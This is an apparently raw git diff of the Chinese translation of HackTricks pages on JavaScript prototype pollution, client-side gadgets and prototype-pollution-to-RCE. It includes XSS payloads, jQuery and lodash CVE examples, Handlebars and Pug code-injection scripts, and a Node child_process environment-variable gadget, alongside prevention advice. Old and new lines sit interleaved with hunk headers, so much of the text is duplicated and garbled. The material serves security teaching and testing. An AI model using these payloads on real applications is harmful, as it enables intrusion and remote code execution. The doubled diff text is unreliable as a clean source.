通过原型污染全局影响 JavaScript 对象的两种方法包括:
1. 直接污染`Object.prototype`
1. 直接污染 `Object.prototype`
```javascript
Object.prototype.goodbye = function() { console.log("Goodbye!"); };
```
@ -115,11 +118,13 @@ Object.prototype.goodbye = function() { console.log("Goodbye!"); };
var example = {"key": "value"};
example.constructor.prototype.greet = function() { console.log("Hello!"); };
```
在这些操作之后,每个 JavaScript 对象都可以执行 `goodbye``greet` 方法。
## 污染其他对象
### 从类到Object.prototype
### 从类到 Object.prototype
在一个场景中,您可以**污染特定对象**并且需要**访问`Object.prototype`**,您可以使用类似以下代码进行搜索:
在一个可以 **污染特定对象** 的场景中,如果你需要 **到达 `Object.prototype`**,你可以使用以下代码进行搜索:
```javascript
// From https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challenge-author-writeup/
@ -142,7 +147,7 @@ console.log(key1 + "." + key2)
```
### 数组元素污染
请注意正如您可以污染JS对象的属性一样如果您可以污染一个数组您也可以**污染可以通过索引访问的数组的值**(请注意,您无法覆盖值,因此您需要污染某种方式使用但未写入的索引)。
注意,由于您可以污染 JS 中对象的属性,如果您有权污染数组,您也可以通过索引**污染数组的值**(请注意,您不能覆盖值,因此您需要污染以某种方式使用但未被写入的索引)。
```javascript
c = [1,2]
a = []
@ -152,9 +157,9 @@ b[0] //undefined
b[1] //"yolo"
c[1] // 2 -- not
```
### Html元素污染
### Html elements pollution
在通过JS生成HTML元素时可以**覆盖** **`innerHTML`** 属性,使其编写**任意HTML代码。** [灵感和示例来自此文章](https://blog.huli.tw/2022/04/25/en/intigriti-0422-xss-challenge-author-writeup/)。
通过 JS 生成 HTML 元素时,可以 **覆盖** **`innerHTML`** 属性,使其写入 **任意 HTML 代码。** [这个写作的想法和示例](https://blog.huli.tw/2022/04/25/en/intigriti-0422-xss-challenge-author-writeup/).
{% code overflow="wrap" %}
```javascript
@ -169,35 +174,35 @@ settings[root][ownerDocument][body][innerHTML]="<svg onload=alert(document.domai
```
{% endcode %}
## 例
##
### 基本示例
原型污染是由于应用程序中存在漏洞,允许在 `Object.prototype` 上覆盖属性。这意味着由于大多数对象从 `Object.prototype` 派生其属性
原型污染是由于应用程序中的缺陷导致的,该缺陷允许覆盖 `Object.prototype` 上的属性。这意味着大多数对象从 `Object.prototype` 派生其属性
最简单的示例是向将要被检查的对象的**未定义属性**添加一个值,如:
最简单的示例是向一个**未定义属性的对象**添加一个值,该对象将被检查,例如:
```javascript
if (user.admin) {
```
如果属性 **`admin` 未定义**就有可能滥用原型污染并将其设置为 True类似于以下操作
如果属性 **`admin` 未定义**则可以利用 PP 并将其设置为 True例如
```javascript
Object.prototype.isAdmin = true
let user = {}
user.isAdmin // true
```
这背后的机制涉及操纵属性,以便如果攻击者控制某些输入,他们可以修改应用程序中所有对象的原型。这种操纵通常涉及设置 `__proto__` 属性在JavaScript中这与直接修改对象的原型同义
机制涉及操纵属性,以便如果攻击者控制某些输入,他们可以修改应用程序中所有对象的原型。这种操纵通常涉及设置 `__proto__` 属性,在 JavaScript 中,这与直接修改对象的原型同义。
可以成功执行此攻击的条件,如特定[研究](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript\_prototype\_pollution\_attack\_in\_NodeJS.pdf)中所述,包括:
成功执行此攻击的条件,如特定 [研究](https://github.com/HoLyVieR/prototype-pollution-nsec18/blob/master/paper/JavaScript\_prototype\_pollution\_attack\_in\_NodeJS.pdf) 中所述,包括:
* 执行递归合并。
* 基于路径定义属性。
* 根据路径定义属性。
* 克隆对象。
### 覆盖函数
### Override function
```python
customer.__proto__.toString = ()=>{alert("polluted")}
```
### Proto污染到RCE
### Proto Pollution to RCE
{% content-ref url="prototype-pollution-to-rce.md" %}
[prototype-pollution-to-rce.md](prototype-pollution-to-rce.md)
@ -207,53 +212,53 @@ customer.__proto__.toString = ()=>{alert("polluted")}
* [https://github.com/KTH-LangSec/server-side-prototype-pollution](https://github.com/KTH-LangSec/server-side-prototype-pollution)
## 客户端原型污染到XSS
## Client-side prototype pollution to XSS
{% content-ref url="client-side-prototype-pollution.md" %}
[client-side-prototype-pollution.md](client-side-prototype-pollution.md)
{% endcontent-ref %}
### CVE-201911358通过jQuery $ .extend进行原型污染攻击
### CVE-201911358: 通过 jQuery $ .extend 的原型污染攻击
[有关更多详细信息,请查看文章](https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7) 在jQuery中如果深度复制功能被错误使用`$ .extend` 函数可能导致原型污染。该函数通常用于克隆对象或从默认对象合并属性。但是,当配置错误时,本应分配给新对象的属性可能被分配给原型。例如:
[有关更多详细信息,请查看这篇文章](https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7) 在 jQuery 中,`$ .extend` 函数如果深拷贝功能使用不当,可能导致原型污染。此函数通常用于克隆对象或合并默认对象的属性。然而,当配置错误时,原本用于新对象的属性可能会被分配给原型。例如:
```javascript
$.extend(true, {}, JSON.parse('{"__proto__": {"devMode": true}}'));
console.log({}.devMode); // Outputs: true
```
这个漏洞被标识为CVE-2019-11358说明了深拷贝可能会无意中修改原型导致潜在的安全风险比如如果像`isAdmin`这样的属性在没有适当存在验证的情况下被检查,可能导致未经授权的管理员访问。
此漏洞被识别为 CVE-201911358说明深拷贝如何无意中修改原型从而导致潜在的安全风险例如如果像 `isAdmin` 这样的属性在没有适当存在验证的情况下被检查,可能导致未经授权的管理员访问。
### CVE-2018-3721CVE-2019-10744通过lodash进行原型污染攻击
### CVE-20183721, CVE-201910744: 通过 lodash 的原型污染攻击
[有关更多详细信息,请查看此文章](https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7)
[有关更多详细信息,请查看本文](https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7)
[Lodash](https://www.npmjs.com/package/lodash) 遇到了类似的原型污染漏洞CVE-2018-3721CVE-2019-10744。这些问题已在版本4.17.11中得到解决
[Lodash](https://www.npmjs.com/package/lodash) 遇到了类似的原型污染漏洞 (CVE-20183721, CVE-201910744)。这些问题在版本 4.17.11 中得到了修复
### 具有CVE的另一个教程
### 另一个包含 CVE 的教程
{% embed url="https://infosecwriteups.com/javascript-prototype-pollution-practice-of-finding-and-exploitation-f97284333b2" %}
### 用于检测原型污染的工具
### 检测原型污染的工具
* [**Server-Side-Prototype-Pollution-Gadgets-Scanner**](https://github.com/doyensec/Server-Side-Prototype-Pollution-Gadgets-Scanner)Burp Suite扩展程序旨在检测和分析Web应用程序中的服务器端原型污染漏洞。该工具自动化扫描请求的过程,以识别潜在的原型污染问题。它利用已知的小工具gadgets- 利用原型污染执行有害操作的方法 - 特别关注Node.js库。
* [**server-side-prototype-pollution**](https://github.com/portswigger/server-side-prototype-pollution):此扩展程序识别服务器端原型污染漏洞。它使用[服务器端原型污染](https://portswigger.net/research/server-side-prototype-pollution)中描述的技术。
* [**Server-Side-Prototype-Pollution-Gadgets-Scanner**](https://github.com/doyensec/Server-Side-Prototype-Pollution-Gadgets-Scanner): Burp Suite 扩展,旨在检测和分析 Web 应用程序中的服务器端原型污染漏洞。该工具自动化扫描请求的过程,以识别潜在的原型污染问题。它利用已知的工具 - 利用原型污染执行有害操作的方法 - 特别关注 Node.js 库。
* [**server-side-prototype-pollution**](https://github.com/portswigger/server-side-prototype-pollution): 此扩展识别服务器端原型污染漏洞。它使用在 [server side prototype pollution](https://portswigger.net/research/server-side-prototype-pollution) 中描述的技术。
### NodeJS中的AST原型污染
### NodeJS 中的 AST 原型污染
NodeJS在JavaScript中广泛使用抽象语法树AST来实现功能如模板引擎和TypeScript。本节探讨了与模板引擎中原型污染相关的漏洞特别是Handlebars和Pug
NodeJS 在 JavaScript 中广泛使用抽象语法树 (AST) 进行模板引擎和 TypeScript 等功能。本节探讨与模板引擎(特别是 Handlebars 和 Pug中的原型污染相关的漏洞
#### Handlebars漏洞分析
#### Handlebars 漏洞分析
Handlebars模板引擎容易受到原型污染攻击。此漏洞源自`javascript-compiler.js`文件中的特定函数。例如,`appendContent`函数会在存在`pendingContent`时连接它,而`pushSource`函数在添加源代码后将`pendingContent`重置为`undefined`
Handlebars 模板引擎易受原型污染攻击。此漏洞源于 `javascript-compiler.js` 文件中的特定函数。例如,`appendContent` 函数在存在时会连接 `pendingContent`,而 `pushSource` 函数在添加源后会将 `pendingContent` 重置为 `undefined`
**利用过程**
利用AST抽象语法树由Handlebars生成,遵循以下步骤:
利用过程利用 Handlebars 生成的 AST抽象语法树,遵循以下步骤:
1. **解析器的操纵**:首先,解析器通过`NumberLiteral`节点强制值为数字。原型污染可以绕过这一点,使非数字字符串插入
2. **编译器的处理**编译器可以处理AST对象或字符串模板。如果`input.type`等于`Program`,则输入视为预解析,可以被利用。
3. **代码注入**:通过操纵`Object.prototype`,可以将任意代码注入模板函数,可能导致远程代码执行。
1. **解析器的操控**:最初,解析器通过 `NumberLiteral` 节点强制值为数字。原型污染可以规避此限制,从而允许插入非数字字符串
2. **编译器的处理**:编译器可以处理 AST 对象或字符串模板。如果 `input.type` 等于 `Program`,则输入视为预解析,可以被利用。
3. **代码注入**:通过操`Object.prototype`,可以将任意代码注入模板函数,这可能导致远程代码执行。
演示利用Handlebars漏洞的示例:
一个演示 Handlebars 漏洞利用的示例:
```javascript
const Handlebars = require('handlebars');
@ -276,13 +281,13 @@ const template = Handlebars.precompile(source);
console.log(eval('(' + template + ')')['main'].toString());
```
这段代码展示了攻击者如何将任意代码注入Handlebars模板中。
这段代码展示了攻击者如何将任意代码注入Handlebars 模板中。
**外部参考**: 在'flat'库中发现了与原型污染相关的问题,详细信息请参阅: [GitHub上的问题](https://github.com/hughsk/flat/issues/105)。
**外部参考**:在 'flat' 库中发现了与原型污染相关的问题,详细信息见此处:[GitHub 问题](https://github.com/hughsk/flat/issues/105)。
**外部参考**: [与'flat'库中原型污染相关的问题](https://github.com/hughsk/flat/issues/105)
**外部参考**[与 'flat' 库中的原型污染相关的问题](https://github.com/hughsk/flat/issues/105)
Python中原型污染利用的示例:
Python 中原型污染利用的示例:
```python
import requests
@ -308,9 +313,11 @@ requests.post(TARGET_URL + '/vulnerable', json = {
# execute
requests.get(TARGET_URL)
```
#### Pug漏洞
#### Pug 漏洞
Pug另一个模板引擎面临着原型污染的类似风险。有关更详细的信息请参阅[Pug中的AST注入讨论](https://blog.p6.is/AST-Injection/#Pug)。
Pug另一个模板引擎面临着类似的原型污染风险。详细信息可在关于 [Pug 中的 AST 注入](https://blog.p6.is/AST-Injection/#Pug) 的讨论中找到。
Pug 中原型污染的示例:
```python
import requests
@ -329,37 +336,38 @@ requests.get(TARGET_URL)
```
### 预防措施
为了减少原型污染的风险,可以采用以下列出的策略:
为了降低原型污染的风险,可以采用以下策略:
1. **对象不可变性**:可以通过应用 `Object.freeze` 使 `Object.prototype` 不可变。
2. **输入验证**JSON 输入应该严格根据应用程序的模式进行验证。
3. **安全合并函数**:应避免不安全使用递归合并函数
4. **无原型对象**:可以使用 `Object.create(null)` 创建没有原型属性的对象。
5. **使用 Map**:应使用 `Map` 而不是 `Object` 来存储键值对
6. **库更新**可以通过定期更新库来整合安全补丁。
7. **代码检查工具**:使用诸如 ESLint 等适当插件的工具来检测和防止原型污染漏洞。
1. **对象不可变性**:可以通过应用 `Object.freeze` 使 `Object.prototype` 变为不可变。
2. **输入验证**JSON 输入应严格根据应用程序的架构进行验证。
3. **安全合并函数**:应避免不安全的递归合并函数使用
4. **无原型对象**:可以使用 `Object.create(null)` 创建没有原型属性的对象。
5. **使用 Map**:应使用 `Map` 来存储键值对,而不是 `Object`
6. **库更新**通过定期更新库来纳入安全补丁。
7. **Linter 和静态分析工具**:使用像 ESLint 这样的工具及适当的插件来检测和防止原型污染漏洞。
8. **代码审查**:实施彻底的代码审查,以识别和修复与原型污染相关的潜在风险。
9. **安全培训**:教育开发人员有关原型污染的风险以及编写安全代码的最佳实践。
10. **谨慎使用库**:在使用第三方库时要谨慎。评估它们的安全状况并审查它们的代码,特别是那些操作对象的代码
11. **运行时保护**:采用运行时保护机制,例如使用专注于安全的 npm 包,可以检测和防止原型污染攻击。
9. **安全培训**:教育开发人员有关原型污染的风险编写安全代码的最佳实践。
10. **谨慎使用库**:在使用第三方库时要谨慎。评估其安全态势并审查其代码,特别是那些操作对象的库
11. **运行时保护**:采用运行时保护机制,例如使用安全导向的 npm 包,这些包可以检测和防止原型污染攻击。
## 参考资料
## 参考文献
* [https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/)
* [https://dev.to/caffiendkitten/prototype-inheritance-pollution-2o5l](https://dev.to/caffiendkitten/prototype-inheritance-pollution-2o5l)
* [https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7](https://itnext.io/prototype-pollution-attack-on-nodejs-applications-94a8582373e7)
* [https://blog.p6.is/AST-Injection/](https://blog.p6.is/AST-Injection/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的 **公司在 HackTricks 中做广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 **HackTricks****HackTricks Cloud** github 仓库提交 PR 来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}

View file

@ -1,26 +1,27 @@
# 客户端原型污染
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
- 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
- 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
- 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
- **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
- 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 使用自动工具进行发现
## 使用自动工具发现
工具[**https://github.com/dwisiswant0/ppfuzz**](https://github.com/dwisiswant0/ppfuzz?tag=v1.0.0)****[**https://github.com/kleiton0x00/ppmap**](https://github.com/kleiton0x00/ppmap) **和**[**https://github.com/kosmosec/proto-find**](https://github.com/kosmosec/proto-find)可用于**发现原型污染漏洞**
工具 [**https://github.com/dwisiswant0/ppfuzz**](https://github.com/dwisiswant0/ppfuzz?tag=v1.0.0)**,** [**https://github.com/kleiton0x00/ppmap**](https://github.com/kleiton0x00/ppmap) **和** [**https://github.com/kosmosec/proto-find**](https://github.com/kosmosec/proto-find) 可用于 **查找原型污染漏洞**
此外,您还可以使用**浏览器扩展程序**[**PPScan**](https://github.com/msrkp/PPScan)来**自动** **扫描**您**访问**的**页面**以查找原型污染漏洞。
此外,您还可以使用 **浏览器扩展** [**PPScan**](https://github.com/msrkp/PPScan) **自动** **扫描****访问的** **页面** 以查找原型污染漏洞。
### 调试属性使用位置 <a href="#id-5530" id="id-5530"></a>
### 调试属性使用位置 <a href="#id-5530" id="id-5530"></a>
{% code overflow="wrap" %}
```javascript
@ -32,15 +33,15 @@ return 'test';
```
{% endcode %}
### 找原型污染的根本原因 <a href="#id-5530" id="id-5530"></a>
### 找原型污染的根本原因 <a href="#id-5530" id="id-5530"></a>
一旦任何工具识别出原型污染漏洞,并且如果代码不是过于复杂,您可以通过在 Chrome 开发者工具中搜索诸如 `location.hash`、`decodeURIComponent` 或 `location.search` 等关键字来找到漏洞。这种方法可以帮助您准确定位 JavaScript 代码中的易受攻击部分。
一旦通过任何工具识别出原型污染漏洞,并且代码不是过于复杂,您可以通过在 Chrome 开发者工具中搜索关键字,如 `location.hash`、`decodeURIComponent` 或 `location.search`,来找到漏洞。这种方法可以帮助您准确定位 JavaScript 代码中的脆弱部分。
对于更大更复杂的代码库,发现易受攻击代码的简单方法包括以下步骤:
对于更大和更复杂的代码库,发现脆弱代码的简单方法包括以下步骤:
1. 使用工具识别漏洞并获取一个旨在在构造函数中设置属性的有效载荷。ppmap 提供的一个示例可能如下所示`constructor[prototype][ppmap]=reserved`。
2. 在将在页面上执行的第一行 JavaScript 代码处设置断点。使用有效载荷刷新页面,使执行在此断点处暂停
3. 在 JavaScript 执行暂停时,在 JS 控制台中执行以下脚本。此脚本将在创建 'ppmap' 属性时发出信号,有助于定位其来源:
1. 使用工具识别漏洞并获取一个旨在设置构造函数中属性的有效载荷。ppmap 提供的示例可能看起来像`constructor[prototype][ppmap]=reserved`。
2. 在页面上将要执行的 JavaScript 代码的第一行设置断点。使用有效载荷刷新页面,在此断点处暂停执行
3. 当 JavaScript 执行暂停时,在 JS 控制台中执行以下脚本。该脚本将在创建 'ppmap' 属性时发出信号,帮助定位其来源:
```javascript
function debugAccess(obj, prop, debugGet=true){
@ -62,30 +63,30 @@ origValue = val;
debugAccess(Object.prototype, 'ppmap')
```
4. 导航回**Sources**选项卡选择“恢复脚本执行”。JavaScript 将继续执行,并且'ppmap'属性将如预期般被污染。利用提供的代码片段有助于确定'ppmap'属性被污染的确切位置。通过检查**调用堆栈**,可以观察到发生污染的不同堆栈。
4. 返回到 **Sources** 标签并选择“恢复脚本执行”。JavaScript 将继续执行,'ppmap' 属性将如预期被污染。利用提供的代码片段可以帮助识别 'ppmap' 属性被污染的确切位置。通过检查 **Call Stack**,可以观察到污染发生的不同堆栈。
在决定调查哪个堆栈时,通常有用的方法是针对与 JavaScript 库文件相关的堆栈,因为原型污染经常发生在这些库中。通过检查其与库文件的关联来识别相关堆栈(在右侧可见,类似于提供的指南图像)。在存在多个堆栈的情况下,例如第 4 行和第 6 行,逻辑选择是第 4 行的堆栈,因为它代表了污染的初始发生,从而是漏洞的根本原因。单击堆栈将引导您到易受攻击的代码。
在决定调查哪个堆栈时,通常有用的是针对与 JavaScript 库文件相关的堆栈,因为原型污染通常发生在这些库中。通过检查其与库文件的关联(在右侧可见,类似于提供的图像作为指导)来识别相关堆栈。在有多个堆栈的情况下,例如第 4 行和第 6 行,逻辑选择是第 4 行的堆栈,因为它代表了污染的初始发生,从而是漏洞的根本原因。点击该堆栈将引导您到易受攻击的代码。
![https://miro.medium.com/max/1400/1\*S8NBOl1a7f1zhJxlh-6g4w.jpeg](https://miro.medium.com/max/1400/1\*S8NBOl1a7f1zhJxlh-6g4w.jpeg)
## 查找脚本小工具
小工具是**一旦发现 PP 漏洞将被滥用的代码**。
小工具是 **一旦发现 PP 漏洞将被滥用的代码**
如果应用程序很简单,我们可以**搜索**关键字,如**`srcdoc/innerHTML/iframe/createElement`,并查看源代码,检查是否**导致 JavaScript 执行**。有时,提到的技术可能根本找不到小工具。在这种情况下,纯源代码审查会揭示一些不错的小工具,如下面的示例。
如果应用程序很简单,我们可以 **搜索** **关键词**,如 **`srcdoc/innerHTML/iframe/createElement`** 并查看源代码,检查是否 l**eads to javascript execution**。有时,提到的技术可能根本找不到小工具。在这种情况下,纯源代码审查会揭示一些不错的小工具,如下面的示例。
### 在 Mithil 库代码中找 PP 小工具的示例
### 示例 在 Mithil 库代码中找 PP 小工具
查看此文档:[https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challenge-author-writeup/](https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challenge-author-writeup/)
查看此写作: [https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challenge-author-writeup/](https://blog.huli.tw/2022/05/02/en/intigriti-revenge-challenge-author-writeup/)
## 重新编译用于有漏洞库的有效载荷
## 针对易受攻击库的有效负载重新编译
* [https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet#prototype-pollution)
* [https://github.com/BlackFan/client-side-prototype-pollution](https://github.com/BlackFan/client-side-prototype-pollution)
## 通过 PP 绕过 HTML 消毒
## 通过 PP 绕过 HTML 清理
[**这项研究**](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/)展示了可用于通过某些 HTML 消毒器库提供的**消毒**的 PP 小工具:
[**这项研究**](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/) 显示了用于 **绕过某些 HTML 清理器库提供的清理** 的 PP 小工具:
* **sanitize-html**
@ -117,22 +118,23 @@ const node = goog.dom.safeHtmlToNode(sanitized);
document.body.append(node);
</script>
```
## 参考资料
## 参考文献
* [https://infosecwriteups.com/hunting-for-prototype-pollution-and-its-vulnerable-code-on-js-libraries-5bab2d6dc746](https://infosecwriteups.com/hunting-for-prototype-pollution-and-its-vulnerable-code-on-js-libraries-5bab2d6dc746)
* [https://blog.s1r1us.ninja/research/PP](https://blog.s1r1us.ninja/research/PP)
* [https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/#:\~:text=my%20challenge.-,Closure,-Closure%20Sanitizer%20has](https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/)
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,22 +1,23 @@
# 原型污染到RCE
# Prototype Pollution to RCE
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## 可能受到影响的代码
## 易受攻击的代码
想象一个真实的JS使用以下代码
想象一下一个真实的 JS 使用以下代码:
```javascript
const { execSync, fork } = require('child_process');
@ -49,11 +50,11 @@ clone(USERINPUT);
// Create an a_file.js file in the current dir: `echo a=2 > a_file.js`
var proc = fork('a_file.js');
```
## 通过环境变量实现PP2RCE
## PP2RCE 通过环境变量
**PP2RCE** 意味着 **原型污染到远程代码执行**Remote Code Execution)。
**PP2RCE** 意味着 **原型污染到 RCE**远程代码执行)。
根据这个[**解说**](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/),当使用 **`child_process`** 中的某个方法(如 `fork``spawn` 或其他方法生成一个 **进程** 时,它调用方法 `normalizeSpawnArguments`,这个方法利用 **原型污染小工具来创建新的环境变量**
根据这个 [**写作**](https://research.securitum.com/prototype-pollution-rce-kibana-cve-2019-7609/),当一个 **进程被生成** 使用 **`child_process`** 的某些方法(如 `fork``spawn` 或其他)时,它调用方法 `normalizeSpawnArguments`,这是一个 **原型污染工具,用于创建新的环境变量**
```javascript
//See code in https://github.com/nodejs/node/blob/02aa8c22c26220e16616a88370d111c0229efe5e/lib/child_process.js#L638-L686
@ -73,15 +74,17 @@ ArrayPrototypePush(envPairs, `${key}=${value}`); // <-- Pollution
}
}
```
### **污染 `__proto__`**
检查代码,你可以看到通过**污染**属性**`.env`**可以**毒害 `envPairs`**。
### **毒害 `__proto__`**
{% hint style="warning" %}
请注意,由于`node`的`child_process`库中的`normalizeSpawnArguments`函数的工作方式,当调用某些内容以为进程设置新的环境变量时,你只需要**污染任何内容**。\
例如,如果你执行`__proto__.avar="valuevar"`,进程将被生成一个名为`avar`,值为`valuevar`的变量
请注意,由于node的**`child_process`**库中的**`normalizeSpawnArguments`**函数的工作方式,当调用某个函数以**设置新的环境变量**时,你只需要**污染任何东西**。\
